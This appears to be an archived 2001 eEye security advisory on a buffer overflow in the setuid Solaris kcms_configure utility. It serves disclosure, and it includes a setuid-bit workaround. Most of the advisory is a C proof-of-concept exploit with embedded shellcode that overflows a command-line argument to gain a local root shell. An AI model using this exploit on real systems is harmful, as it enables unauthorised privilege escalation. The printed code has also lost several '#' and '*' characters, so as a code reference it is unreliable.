Solaris kcms_configure vulnerability

2001-04-10T00:00:00
ID SECURITYVULNS:DOC:1486
Type securityvulns
Reporter Securityvulns
Modified 2001-04-10T00:00:00

Description

Solaris kcms_configure vulnerability

Discovered and exploited by: Riley Hassell riley@eeye.com

Release Date: April 9, 2001

Systems Affected: Solaris 7/8 (x86 and sparc) Versions prior are also most likely affected

Description: It was another long day at eEye where the beer was once again cold but eEye Wudan member Riley decided it was time to do some Solaris spring cleaning. This is the first of several advisories to be released on various Solaris bugs that were laying around needing to be cleaned out.

We have discovered a buffer overflow in the kcms_configure utility provided with Solaris 7. The problem exists in the parsing of command line options. By exploiting this vulnerability an attacker can achieve local root privileges. The Kodak Color Management System (KCMS) packages have contained many vulnerabilities in the past, we recommend disabling them if you are not currently using them.

Proof of Concept:

/* Command line argument overflow /usr/openwin/bin/kcms_configure

Proof of Concept Exploitation Riley Hassell */

include <stdio.h>

include <stdlib.h>

include <string.h>

include <unistd.h>

define BUFLEN 1100

/ seteuid/exec shellcode / char shell[] = "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05\xe8\xf9\xff\xff\xff" "\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50\xb0\x8d\xe8\xe0\xff\xff\xff" "\x29\xc0\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb\x1f\x5e\x8d\x1e\x89\x5e" "\x0b\x29\xc0\x88\x46\x19\x89\x46\x14\x89\x46\x0f\x89\x46\x07\xb0" "\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff\xff\x2f\x62" "\x69\x6e\x2f\x73\x68\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03" "\x03\x9a\x04\x04\x04\x04\x07\x04";

char buf[BUFLEN]; unsigned long int nop, esp; long int offset = 0;

unsigned long int get_esp() { asm("movl %esp,%eax");}

int main (int argc, char argv[]) { int i; if (argc > 1) offset = strtol(argv[1], NULL, 0); else offset = -300; nop = 600; esp = get_esp(); memset(buf, 0x90, BUFLEN); memcpy(buf+600, shell, strlen(shell)); for (i = nop+strlen(shell)+1; i <= BUFLEN-4; i += 4) ((int *) &buf[i]) = esp+offset; buf[BUFLEN-1] = '\0'; execl("/usr/openwin/bin/kcms_configure", "eEye", "-o","-S","X",buf,NULL); return; }

Vendor Status: Sun Microsystems has been contacted. They are currently working on patches for this and other related vulnerabilities eEye has discovered. We would like to thank them for working with us on creating a patch for this vulnerability.

Workaround: chmod –s /usr/openwin/bin/kcms_configure This will remove the setuid bit from kcms_configure, therefore if someone does exploit this vulnerability, they won’t gain higher privileges.

Greetings: ADM, Ryan “shellcode ninja” Permeh, KAM, Lamagra, Zen-Parse, Loki, and last but not least… all the kick ass people at Speakeasy.net.

Copyright (c) 1998-2001 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission.

Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Feedback Please send suggestions, updates, and comments to:

eEye Digital Security http://www.eEye.com info@eEye.com